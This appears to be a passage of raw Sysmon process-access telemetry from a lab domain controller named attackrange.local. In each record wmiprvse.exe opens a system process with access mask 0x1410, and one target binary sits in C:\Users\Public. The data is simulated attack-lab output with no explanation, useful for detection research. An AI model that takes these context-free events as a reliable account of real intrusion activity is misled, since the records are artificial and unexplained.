Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 